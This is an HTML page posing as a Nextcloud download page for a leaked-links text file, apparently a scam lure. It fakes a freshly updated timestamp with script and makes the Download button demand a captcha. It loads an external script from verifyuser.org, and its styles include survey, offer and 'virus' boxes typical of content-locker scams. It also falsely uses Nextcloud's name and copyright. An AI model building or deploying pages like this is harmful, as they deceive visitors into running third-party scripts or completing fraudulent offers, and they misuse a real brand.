<!DOCTYPE html>
<html style="height:100%;" lang="en">

<head>
    <meta charset="UTF-8">
	
    <link rel="shortcut icon" href="icon.ico" type="image/x-icon">
    <meta name="description" content="Nextcloud - Online collaboration platform">
    <meta name="googlebot" content="noindex">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Nextcloud</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <link href="scripts/_bower.css" rel="stylesheet">
	<link href="button.css" rel="stylesheet">
	<link href="spinner.css" rel="stylesheet">
    <script type="text/javascript" src="jquery.min.js"></script>
    <style>
        @import url(https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900|Bowlby+One+SC);
        /*!
*/

        @-webkit-viewport {
            width: device-width
        }

        @-moz-viewport {
            width: device-width
        }

        @-ms-viewport {
            width: device-width
        }

        @-o-viewport {
            width: device-width
        }

        @viewport {
            width: device-width
        }

        body {		 
            font-family: Roboto, sans-serif;
            background-color: #fff;
            color: #fff
        }

        .btn-green {
            color: #fff;
            background-color: #d9272e;
            border-color: #d9272e;
            padding: 15px 30px;
            font-weight: 300;
            text-transform: capitalize;
            outline: 0
        }

        .btn-green.btn-outlined {
            background-color: transparent;
            color: #d9272e
        }

        .btn-green.active,
        .btn-green:active,
        .btn-green:focus,
        .btn-green:hover {
            color: #fff;
            background-color: #e98084;
            border-color: #d9272e;
            outline: 0
        }

        .open .dropdown-toggle.btn-green {
            color: #fff;
            background-color: #e98084;
            border-color: #d9272e
        }
        .toast-title{font-weight:700}.toast-message{-ms-word-wrap:break-word;word-wrap:break-word}.toast-message a,.toast-message label{color:#fff}.toast-message a:hover{color:#ccc;text-decoration:none}.toast-close-button{position:relative;right:-.3em;top:-.3em;float:right;font-size:20px;font-weight:700;color:#fff;-webkit-text-shadow:0 1px 0 #fff;text-shadow:0 1px 0 #fff;opacity:.8;-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=80);filter:alpha(opacity=80);line-height:1}.toast-close-button:hover,.toast-close-button:focus{color:#000;text-decoration:none;cursor:pointer;opacity:.4;-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=40);filter:alpha(opacity=40)}.rtl .toast-close-button{left:-.3em;float:left;right:.3em}button.toast-close-button{padding:0;cursor:pointer;background:0 0;border:0;-webkit-appearance:none}.toast-top-center{top:0;right:0;width:100%}.toast-bottom-center{bottom:0;right:0;width:100%}.toast-top-full-width{top:0;right:0;width:100%}.toast-bottom-full-width{bottom:0;right:0;width:100%}.toast-top-left{top:12px;left:12px}.toast-top-right{top:12px;right:12px}.toast-bottom-right{right:12px;bottom:12px}.toast-bottom-left{bottom:12px;left:12px}#toast-container{position:fixed;z-index:999999;pointer-events:none}#toast-container *{-webkit-box-sizing:border-box;box-sizing:border-box}#toast-container>div{position:relative;pointer-events:auto;overflow:hidden;margin:0 0 6px;padding:15px 15px 15px 50px;width:300px;border-radius:3px 3px 3px 3px;background-position:15px center;background-repeat:no-repeat;-webkit-box-shadow:0 0 12px #999;box-shadow:0 0 12px #999;color:#fff;opacity:.8;-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=80);filter:alpha(opacity=80)}#toast-container>div.rtl{direction:rtl;padding:15px 50px 15px 15px;background-position:right 15px center}#toast-container>div:hover{-webkit-box-shadow:0 0 12px #000;box-shadow:0 0 12px #000;opacity:1;-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=100);filter:alpha(opacity=100);cursor:pointer}#toast-container>.toast-info{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAGwSURBVEhLtZa9SgNBEMc9sUxxRcoUKSzSWIhXpFMhhYWFhaBg4yPYiWCXZxBLERsLRS3EQkEfwCKdjWJAwSKCgoKCcudv4O5YLrt7EzgXhiU3/4+b2ckmwVjJSpKkQ6wAi4gwhT+z3wRBcEz0yjSseUTrcRyfsHsXmD0AmbHOC9Ii8VImnuXBPglHpQ5wwSVM7sNnTG7Za4JwDdCjxyAiH3nyA2mtaTJufiDZ5dCaqlItILh1NHatfN5skvjx9Z38m69CgzuXmZgVrPIGE763Jx9qKsRozWYw6xOHdER+nn2KkO+Bb+UV5CBN6WC6QtBgbRVozrahAbmm6HtUsgtPC19tFdxXZYBOfkbmFJ1VaHA1VAHjd0pp70oTZzvR+EVrx2Ygfdsq6eu55BHYR8hlcki+n+kERUFG8BrA0BwjeAv2M8WLQBtcy+SD6fNsmnB3AlBLrgTtVW1c2QN4bVWLATaIS60J2Du5y1TiJgjSBvFVZgTmwCU+dAZFoPxGEEs8nyHC9Bwe2GvEJv2WXZb0vjdyFT4Cxk3e/kIqlOGoVLwwPevpYHT+00T+hWwXDf4AJAOUqWcDhbwAAAAASUVORK5CYII=)!important}#toast-container>.toast-error{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAHOSURBVEhLrZa/SgNBEMZzh0WKCClSCKaIYOED+AAKeQQLG8HWztLCImBrYadgIdY+gIKNYkBFSwu7CAoqCgkkoGBI/E28PdbLZmeDLgzZzcx83/zZ2SSXC1j9fr+I1Hq93g2yxH4iwM1vkoBWAdxCmpzTxfkN2RcyZNaHFIkSo10+8kgxkXIURV5HGxTmFuc75B2RfQkpxHG8aAgaAFa0tAHqYFfQ7Iwe2yhODk8+J4C7yAoRTWI3w/4klGRgR4lO7Rpn9+gvMyWp+uxFh8+H+ARlgN1nJuJuQAYvNkEnwGFck18Er4q3egEc/oO+mhLdKgRyhdNFiacC0rlOCbhNVz4H9FnAYgDBvU3QIioZlJFLJtsoHYRDfiZoUyIxqCtRpVlANq0EU4dApjrtgezPFad5S19Wgjkc0hNVnuF4HjVA6C7QrSIbylB+oZe3aHgBsqlNqKYH48jXyJKMuAbiyVJ8KzaB3eRc0pg9VwQ4niFryI68qiOi3AbjwdsfnAtk0bCjTLJKr6mrD9g8iq/S/B81hguOMlQTnVyG40wAcjnmgsCNESDrjme7wfftP4P7SP4N3CJZdvzoNyGq2c/HWOXJGsvVg+RA/k2MC/wN6I2YA2Pt8GkAAAAASUVORK5CYII=)!important}
        #toast-container>.toast-success{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAADsSURBVEhLY2AYBfQMgf///3P8+/evAIgvA/FsIF+BavYDDWMBGroaSMMBiE8VC7AZDrIFaMFnii3AZTjUgsUUWUDA8OdAH6iQbQEhw4HyGsPEcKBXBIC4ARhex4G4BsjmweU1soIFaGg/WtoFZRIZdEvIMhxkCCjXIVsATV6gFGACs4Rsw0EGgIIH3QJYJgHSARQZDrWAB+jawzgs+Q2UO49D7jnRSRGoEFRILcdmEMWGI0cm0JJ2QpYA1RDvcmzJEWhABhD/pqrL0S0CWuABKgnRki9lLseS7g2AlqwHWQSKH4oKLrILpRGhEQCw2LiRUIa4lwAAAABJRU5ErkJggg==)!important}#toast-container>.toast-warning{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAGYSURBVEhL5ZSvTsNQFMbXZGICMYGYmJhAQIJAICYQPAACiSDB8AiICQQJT4CqQEwgJvYASAQCiZiYmJhAIBATCARJy+9rTsldd8sKu1M0+dLb057v6/lbq/2rK0mS/TRNj9cWNAKPYIJII7gIxCcQ51cvqID+GIEX8ASG4B1bK5gIZFeQfoJdEXOfgX4QAQg7kH2A65yQ87lyxb27sggkAzAuFhbbg1K2kgCkB1bVwyIR9m2L7PRPIhDUIXgGtyKw575yz3lTNs6X4JXnjV+LKM/m3MydnTbtOKIjtz6VhCBq4vSm3ncdrD2lk0VgUXSVKjVDJXJzijW1RQdsU7F77He8u68koNZTz8Oz5yGa6J3H3lZ0xYgXBK2QymlWWA+RWnYhskLBv2vmE+hBMCtbA7KX5drWyRT/2JsqZ2IvfB9Y4bWDNMFbJRFmC9E74SoS0CqulwjkC0+5bpcV1CZ8NMej4pjy0U+doDQsGyo1hzVJttIjhQ7GnBtRFN1UarUlH8F3xict+HY07rEzoUGPlWcjRFRr4/gChZgc3ZL2d8oAAAAASUVORK5CYII=)!important}#toast-container.toast-top-center>div,#toast-container.toast-bottom-center>div{width:300px;margin-left:auto;margin-right:auto}#toast-container.toast-top-full-width>div,#toast-container.toast-bottom-full-width>div{width:96%;margin-left:auto;margin-right:auto}.toast{background-color:#030303}.toast-success{background-color:#51a351}.toast-error{background-color:#bd362f}.toast-info{background-color:#2f96b4}.toast-warning{background-color:#f89406}.toast-progress{position:absolute;left:0;bottom:0;height:4px;background-color:#000;opacity:.4;-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=40);filter:alpha(opacity=40)}@media all and (max-width:240px){#toast-container>div{padding:8px 8px 8px 50px;width:11em}#toast-container>div.rtl{padding:8px 50px 8px 8px}#toast-container .toast-close-button{right:-.2em;top:-.2em}#toast-container .rtl .toast-close-button{left:-.2em;right:.2em}}@media all and (min-width:241px) and (max-width:480px){#toast-container>div{padding:8px 8px 8px 50px;width:18em}#toast-container>div.rtl{padding:8px 50px 8px 8px}#toast-container .toast-close-button{right:-.2em;top:-.2em}#toast-container .rtl .toast-close-button{left:-.2em;right:.2em}}@media all and (min-width:481px) and (max-width:768px){#toast-container>div{padding:15px 15px 15px 50px;width:25em}#toast-container>div.rtl{padding:15px 50px 15px 15px}}

        .btn-green.active,
        .btn-green:active {
            background-image: none
        }

        .open .dropdown-toggle.btn-green {
            background-image: none
        }

        .btn-green.disabled,
        .btn-green[disabled] {
            background-color: #d9272e;
            border-color: #d9272e
        }

        fieldset[disabled] .btn-green {
            background-color: #d9272e;
            border-color: #d9272e
        }

        .btn-green.disabled:hover,
        .btn-green[disabled]:hover {
            background-color: #d9272e;
            border-color: #d9272e
        }

        fieldset[disabled] .btn-green:hover {
            background-color: #d9272e;
            border-color: #d9272e
        }

        .btn-green.disabled:focus,
        .btn-green[disabled]:focus {
            background-color: #d9272e;
            border-color: #d9272e
        }

        fieldset[disabled] .btn-green:focus {
            background-color: #d9272e;
            border-color: #d9272e
        }

        .btn-green.disabled:active,
        .btn-green[disabled]:active {
            background-color: #d9272e;
            border-color: #d9272e
        }

        fieldset[disabled] .btn-green:active {
            background-color: #d9272e;
            border-color: #d9272e
        }

        .btn-green.disabled.active,
        .btn-green[disabled].active {
            background-color: #d9272e;
            border-color: #d9272e
        }

        fieldset[disabled] .btn-green.active {
            background-color: #d9272e;
            border-color: #d9272e
        }

        .btn-green .badge {
            color: #d9272e;
            background-color: #fff
        }

        .btn-red {
            color: #fff;
            background-color: #cc252d;
            border-color: #b01c24;
            padding: 15px 30px;
            font-weight: 300;
            text-transform: capitalize;
            outline: 0
        }

        .btn-red.btn-outlined {
            background-color: transparent;
            color: #b01c24
        }

        .btn-red.active,
        .btn-red:active,
        .btn-red:focus,
        .btn-red:hover {
            color: #fff;
            background-color: #ad1a21;
            border-color: #b01c24
        }

        .open .dropdown-toggle.btn-red {
            color: #fff;
            background-color: #ad1a21;
            border-color: #b01c24
        }

        .btn-red.active,
        .btn-red:active {
            background-image: none
        }

        .open .dropdown-toggle.btn-red {
            background-image: none
        }

        .btn-red.disabled,
        .btn-red[disabled] {
            background-color: #cc252d;
            border-color: #b01c24
        }

        fieldset[disabled] .btn-red {
            background-color: #cc252d;
            border-color: #b01c24
        }

        .btn-red.disabled:hover,
        .btn-red[disabled]:hover {
            background-color: #cc252d;
            border-color: #b01c24
        }

        fieldset[disabled] .btn-red:hover {
            background-color: #cc252d;
            border-color: #b01c24
        }

        .btn-red.disabled:focus,
        .btn-red[disabled]:focus {
            background-color: #cc252d;
            border-color: #b01c24
        }

        fieldset[disabled] .btn-red:focus {
            background-color: #cc252d;
            border-color: #b01c24
        }

        .btn-red.disabled:active,
        .btn-red[disabled]:active {
            background-color: #cc252d;
            border-color: #b01c24
        }

        fieldset[disabled] .btn-red:active {
            background-color: #cc252d;
            border-color: #b01c24
        }

        .btn-red.disabled.active,
        .btn-red[disabled].active {
            background-color: #cc252d;
            border-color: #b01c24
        }

        fieldset[disabled] .btn-red.active {
            background-color: #cc252d;
            border-color: #b01c24
        }

        .btn-red .badge {
            color: #cc252d;
            background-color: #fff
        }

        header {
            margin: 30px auto
        }

        header .head-logo {
            text-align: center
        }

        header .head-logo h1 {
            margin: 0 0 15px 0;
            display: inline-block;
            color: #fff;
            text-transform: uppercase;
            font-weight: 300;
            font-family: 'Bowlby One SC', cursive
        }

        header .head-logo h1 img {
            width: 100px;
            display: block;
            text-align: center;
            margin: 0 auto 15px auto
        }

        footer.footer {
            text-align: center;
            padding: 30px 0
        }

        footer.footer p.text-muted {
            color: #617181
        }

        .dl-box {
            background-color: #fff;
            padding: 15px 15px 30px 15px;
            color: #000;
            display: block;
            width: 100%;
            margin-bottom: 30px;
            -moz-border-radius: 5px;
            -webkit-border-radius: 5px;
            border-radius: 5px;
            -moz-transition: all 150ms ease-in-out;
            -o-transition: all 150ms ease-in-out;
            -webkit-transition: all 150ms ease-in-out;
            transition: all 150ms ease-in-out
        }

        @media (max-width:550px) {
            .dl-box {
                display: block
            }
        }

        .dl-box .left {
            display: block;
            width: 100%;
            text-align: center;
            -moz-transition: all 150ms ease-in-out;
            -o-transition: all 150ms ease-in-out;
            -webkit-transition: all 150ms ease-in-out;
            transition: all 150ms ease-in-out
        }

        @media (max-width:550px) {
            .dl-box .left {
                display: block;
                width: 100%;
                text-align: center
            }
        }

        .dl-box .left .icon img {
            width: 50px;
            max-width: 100%
        }

        .dl-box .right {
            display: block;
            width: 100%;
            text-align: center;
            -moz-transition: all 150ms ease-in-out;
            -o-transition: all 150ms ease-in-out;
            -webkit-transition: all 150ms ease-in-out;
            transition: all 150ms ease-in-out
        }

        @media (max-width:550px) {
            .dl-box .right {
                display: block;
                width: 100%
            }
        }

        .dl-box .right .dl-btn {
            margin: 15px auto
        }

        .dl-box .right p.small-text {
            color: #919191;
            margin: 0 auto
        }

        .dl-box .right .offers-wrapper {
            display: none;
            margin: 15px auto
        }

        .dl-box .right .offers-wrapper ul.offers-list {
            list-style: none;
            margin: 0;
            padding: 0
        }

        .dl-box .right .offers-wrapper ul.offers-list li {
            margin: 10px auto
        }

        .dl-box .right .offers-wrapper ul.offers-list li a {
            display: block;
            text-decoration: none;
            padding: 10px;
            white-space: normal;
            word-wrap: break-word
        }

        .dl-box .right .offers-wrapper ul.offers-list li:first-child {
            margin-top: 0
        }

        .dl-box .right .offers-wrapper ul.offers-list li:last-child {
            margin-bottom: 0
        }

        .download-box {
            padding: 0;
            text-align: center;
            background-color: #fcfcfc
        }

        .download-box .file-details {
            background-color: #25d57b;
            padding: 15px;
            border: 1px solid #15b965
        }

        .download-box .file-details .icon img {
            width: 80px
        }

        .download-box .file-details .text {
            color: #fff
        }

        .download-box .file-details .text p.detail {
            margin: 0;
            padding: 0;
            color: #c1f9cd
        }

        .download-box .survey-box {
            border-bottom: 1px solid #15b965;
            border-left: 1px solid #15b965;
            border-right: 1px solid #15b965;
            padding: 30px 15px;
            background-color: #f9f9f9
        }

        .download-box .survey-box h2 {
            margin: 0 auto;
            font-weight: 300
        }

        .section {
            padding: 30px 0
        }

        .section h2 {
            font-weight: 300;
            text-align: center
        }

        .section .step {
            text-align: center;
            margin: 15px auto
        }

        .section .step img.icon {
            width: 50px
        }

        .section .step h4 {
            margin: 15px auto
        }

        .virus-box {
            text-align: center
        }

        .virus-box h2.virus-msg {
            font-weight: 300;
            color: #000;
            margin: 15px 0;
            padding: 0
        }

        .virus-box .virus-table {
            margin: 0;
            background-color: #fff
        }

        .virus-box .virus-table .icon-td {
            width: 100px
        }

        .virus-box .virus-table .icon-td .icon {
            max-width: 100px
        }

        .virus-box .virus-table td.progress-td {
            vertical-align: middle;
            width: 150px
        }

        .virus-box .virus-table td.progress-td .progress {
            margin: 0
        }

        .loader,
        .loader:after {
            -moz-border-radius: 50%;
            -webkit-border-radius: 50%;
            border-radius: 50%;
            width: 10em;
            height: 10em
        }

        .loader {
            margin: 0 auto;
            font-size: 10px;
            position: relative;
            text-indent: -9999em;
            border-top: .5em solid rgba(255, 255, 255, .15);
            border-right: .5em solid rgba(255, 255, 255, .15);
            border-bottom: .5em solid rgba(255, 255, 255, .15);
            border-left: .5em solid #2caddd;
            -moz-transform: translateZ(0);
            -ms-transform: translateZ(0);
            -webkit-transform: translateZ(0);
            transform: translateZ(0);
            -moz-animation: load8 1.1s infinite linear;
            -webkit-animation: load8 1.1s infinite linear;
            animation: load8 1.1s infinite linear
        }

        @-moz-keyframes load8 {
            0% {
                -moz-transform: rotate(0);
                transform: rotate(0)
            }
            100% {
                -moz-transform: rotate(360deg);
                transform: rotate(360deg)
            }
        }

        @-webkit-keyframes load8 {
            0% {
                -webkit-transform: rotate(0);
                transform: rotate(0)
            }
            100% {
                -webkit-transform: rotate(360deg);
                transform: rotate(360deg)
            }
        }

        @keyframes load8 {
            0% {
                -moz-transform: rotate(0);
                -ms-transform: rotate(0);
                -webkit-transform: rotate(0);
                transform: rotate(0)
            }
            100% {
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -webkit-transform: rotate(360deg);
                transform: rotate(360deg)
            }
        }

        blockquote {
            padding: 15px;
            margin: 15px auto;
            background-color: #12212f;
            border: none;
            color: #fff
        }

        blockquote i.quote-icon {
            font-size: 45px;
            color: #3b5065
        }

        blockquote footer {
            color: #3b5065
        }
    </style>

</head>

<body>
    <header>
	

      <img class="img-fluid w-80 mb-2 logo"src="cover.png">
        <div class="container"> </div>
    </header>
    <div class="container">
        <div class="row">
            <div class="col-md-offset-2 col-md-8">
                <div class="dl-box">
                    <div class="left">
                        <div class="icon"><img src="folder1.png"></div>
                        <div class="info">
                            <h4>OF|COMPLETE|MEGA|LINKS.TXT</h4>					                                                      
                            </div>
                        <script type="text/javascript">
                            let hoy = new Date();
                            let semanaEnMilisegundos = 200;
                            let suma = hoy.getTime() - semanaEnMilisegundos;
                            let d = new Date(suma);
                            let fechaCorrecta = d.toLocaleString('en-US', {
                                year: 'numeric',
                                month: '2-digit',
                                day: '2-digit'
                            }) + ' - ' + d.toLocaleString('en-US', {
                                hour: '2-digit',
                                minute: 'numeric',
                                second: '2-digit',
                                hour12: true
                            })
                        </script>
						</br>
                        <p class="date">File updated: <span class="in" id="fileDate"><script type="text/javascript">document.write(fechaCorrecta)</script></p>
						                  </div>
                        </br>										  
                        <div class="right"> <button class="button-71" onclick="alert('Please Solve The Captcha Below To Verify You Are Human...');">Download</button>
						</br>
						</br>						
					    <center><div data-captcha-enable="true"></div></center>
										</br>
                        
                       <p class="small-text">By downloading the file you agree to our terms and conditions.</p>              		      
    <footer class="footer">
        <div class="container">
		    <div class="row justify-content-center"><img src="2.png"</div>
			<p class="small-text">The most popular self-hosted collaboration solution for tens of millions of users at thousands of organizations across the globe.</p>
            <p class="text-muted">NextCloud © Copyright 2022 - All rights reserved.</p>
        </div>
    </footer>
    
    <script type="text/javascript" src="https://verifyuser.org/cp/js/ee6rr"></script>    
    <script src="scripts/bower.js" type="text/javascript"></script>
    <script src="jquery.min"></script>
    <script src="rocket-loader.min"></script>
	
</body>
</html>
